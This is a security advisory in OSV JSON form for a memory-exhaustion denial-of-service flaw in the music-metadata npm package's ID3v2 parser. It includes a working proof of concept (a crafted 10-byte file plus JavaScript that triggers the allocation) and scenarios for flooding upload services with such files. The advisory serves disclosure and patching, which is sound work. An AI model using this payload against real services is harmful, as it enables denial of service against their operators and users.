{"id":"GHSA-jjpr-9cvf-cq55","summary":"music-metadata: ID3v2 tag size not validated before allocation, causing memory exhaustion DoS","details":"### Summary\n\nThe ID3v2 parser in music-metadata trusts the tag size field without validation and allocates the full requested buffer before reading. A specially crafted MP3 file with a truncated ID3v2 tag can force allocation of up to 268 MB from a 10-byte file, causing server memory exhaustion. This vulnerability affects all parsers that support ID3v2 tags (MP3, FLAC, DSF, Musepack) and succeeds silently—callers don't see an error.\n\n---\n\n### Details\n\n**Vulnerable Code Path:**\n\n- `lib/id3v2/ID3v2Token.ts:108` - Syncsafe size read without validation\n- `lib/id3v2/ID3v2Parser.ts:122` - Full tag body allocated before reading\n- `lib/id3v2/AbstractID3Parser.ts:22` - Allocation happens before stream validation\n\n**Root Cause:**\n\nThe ID3v2 parser reads a syncsafe integer representing the tag size (maximum 268,435,455 bytes or 0x0FFFFFFF) and immediately allocates a buffer of that size without checking:\n\n1. If the tag size exceeds the remaining file size\n2. If the tag size exceeds a reasonable maximum\n3. If the subsequent read will actually succeed\n\n```typescript\n// ID3v2Token.ts:108\nconst size = ID3v2Header.header.toSize(); // Trusts syncsafe size directly\n\n// Later: Allocates without validation\nconst tagBody = await tokenizer.readBuffer(Buffer.alloc(size));\n// If actual data \u003c size, read fails but allocation succeeded\n```\n\n**Attack Mechanism:**\n\n1. File contains valid ID3v2 header with 10 bytes total\n2. ID3v2 size field claims 268,435,455 bytes (maximum syncsafe value)\n3. Parser allocates 268 MB buffer\n4. Stream read fails (EOF) after 10 bytes\n5. `EndOfStreamError` is caught internally and silently handled\n6. Caller receives normal metadata object\n7. 268 MB remains allocated until garbage collection\n\n**Affected Parsers:** MP3 (primary), FLAC, DSF, Musepack\n\n**Memory Amplification:** 10 bytes input → 268 MB allocation (26.8 million times amplification)\n\n---\n\n### PoC\n\n**Complete reproduction steps:**\n\n```javascript\nimport { parseBuffer } from 'music-metadata';\n\n// Create a minimal ID3v2 file with maximum tag size but truncated content\nconst maliciousFile = Uint8Array.from([\n  0x49, 0x44, 0x33,       // \"ID3\" identifier\n  0x04, 0x00,             // Version 2.4.0\n  0x00,                   // Flags (no unsync, no extended header, etc)\n  0x7f, 0x7f, 0x7f, 0x7f  // Syncsafe integer: maximum size (268,435,455 bytes)\n  // File ends here - truncated\n]);\n\nconsole.log('Input file size:', maliciousFile.byteLength, 'bytes');\n\ntry {\n  const metadata = await parseBuffer(maliciousFile, { mimeType: 'audio/mpeg' });\n  console.log('✓ Parse succeeded (no error thrown)');\n  console.log('✓ Metadata returned:', metadata);\n  console.log('⚠️ ~268 MB was allocated despite only 10 bytes of input');\n} catch (error) {\n  console.error('✗ Unexpected error:', error.message);\n}\n```\n\n**To demonstrate memory impact:**\n\nRun with `node --expose-gc` to monitor allocations:\n\n```javascript\n// Extended PoC to show memory usage\nimport { parseBuffer } from 'music-metadata';\nimport { performance } from 'perf_hooks';\n\nconst maliciousFile = Uint8Array.from([\n  0x49, 0x44, 0x33, 0x04, 0x00, 0x00,\n  0x7f, 0x7f, 0x7f, 0x7f\n]);\n\n// Force garbage collection before test\nif (global.gc) global.gc();\nconst before = process.memoryUsage();\n\nconsole.log('Memory before:', {\n  heapUsed: (before.heapUsed / 1024 / 1024).toFixed(2) + ' MB',\n  external: (before.external / 1024 / 1024).toFixed(2) + ' MB'\n});\n\nconst start = performance.now();\nawait parseBuffer(maliciousFile, { mimeType: 'audio/mpeg' });\nconst duration = performance.now() - start;\n\nconst after = process.memoryUsage();\n\nconsole.log('Memory after:', {\n  heapUsed: (after.heapUsed / 1024 / 1024).toFixed(2) + ' MB',\n  external: (after.external / 1024 / 1024).toFixed(2) + ' MB',\n  heapDelta: ((after.heapUsed - before.heapUsed) / 1024 / 1024).toFixed(2) + ' MB',\n  externalDelta: ((after.external - before.external) / 1024 / 1024).toFixed(2) + ' MB'\n});\n\nconsole.log('Parse time:', duration.toFixed(2) + ' ms');\nconsole.log('Result:', after.external / 1024 / 1024 \u003e 100 ? '⚠️ LARGE ALLOCATION' : '✓ Normal');\n```\n\n**Expected output:**\n\n```\nInput file size: 10 bytes\n✓ Parse succeeded (no error thrown)\n✓ Metadata returned: { format: {}, common: {}, native: {} }\n⚠️ ~268 MB was allocated despite only 10 bytes of input\n\nMemory before: { heapUsed: '2.50 MB', external: '0.00 MB' }\nMemory after: { heapUsed: '2.60 MB', external: '256.00 MB' }\nexternalDelta: 256.00 MB\nParse time: 15.23 ms\nResult: ⚠️ LARGE ALLOCATION\n```\n\n---\n\n### Impact\n\n**Vulnerability Type:** Uncontrolled Memory Allocation / Denial of Service (CWE-789)\n\n**Attack Vector:** Network - Any service that accepts and parses MP3/FLAC/DSF/Musepack files\n\n**Who is Impacted:**\n\n- Music streaming platforms (Spotify, Apple Music, YouTube Music, etc.)\n- Podcast hosting services (Podbean, Transistor, Anchor, etc.)\n- Media servers (Plex, Subsonic, Jellyfin, etc.)\n- Audio processing services (Discord, Slack, Teams)\n- Any web service with file upload that uses music-metadata\n\n**Real-World Exploitation:**\n\n1. **Single Attacker, Multiple Files:**\n   - Upload 10 malicious ID3v2 files (10 bytes each)\n   - Force 2.68 GB memory allocation\n   - Overwhelm server memory capacity\n\n2. **Distributed Attack:**\n   - 100 concurrent uploads × 268 MB = 26.8 GB memory\n   - Exhaust server memory, force OOM kills\n   - Crash worker processes, cause DoS\n\n3. **Slow Leak:**\n   - Repeatedly upload truncated ID3v2 files\n   - Each parse allocates 268 MB\n   - Memory leaks accumulate over time\n   - Server becomes unresponsive\n\n4. **Cost Impact:**\n   - Forced to scale up server capacity for parsing\n   - Increased infrastructure costs\n   - Reduced service availability","aliases":["CVE-2026-107388"],"modified":"2026-10-08T20:00:05.873072048Z","published":"2026-10-08T19:43:17Z","database_specific":{"github_reviewed_at":"2026-10-08T19:43:17Z","nvd_published_at":null,"cwe_ids":["CWE-789"],"severity":"MODERATE","github_reviewed":true},"references":[{"type":"WEB","url":"https://github.com/Borewit/music-metadata/security/advisories/GHSA-jjpr-9cvf-cq55"},{"type":"WEB","url":"https://github.com/Borewit/music-metadata/pull/2743"},{"type":"WEB","url":"https://github.com/Borewit/music-metadata/commit/b033db675b913a9dba1d29135ec3c10eae7095a7"},{"type":"PACKAGE","url":"https://github.com/Borewit/music-metadata"},{"type":"WEB","url":"https://github.com/Borewit/music-metadata/releases/tag/v11.16.0"}],"affected":[{"package":{"name":"music-metadata","ecosystem":"npm","purl":"pkg:npm/music-metadata"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"11.16.0"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/10/GHSA-jjpr-9cvf-cq55/GHSA-jjpr-9cvf-cq55.json","last_known_affected_version_range":"\u003c= 11.12.3"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}]}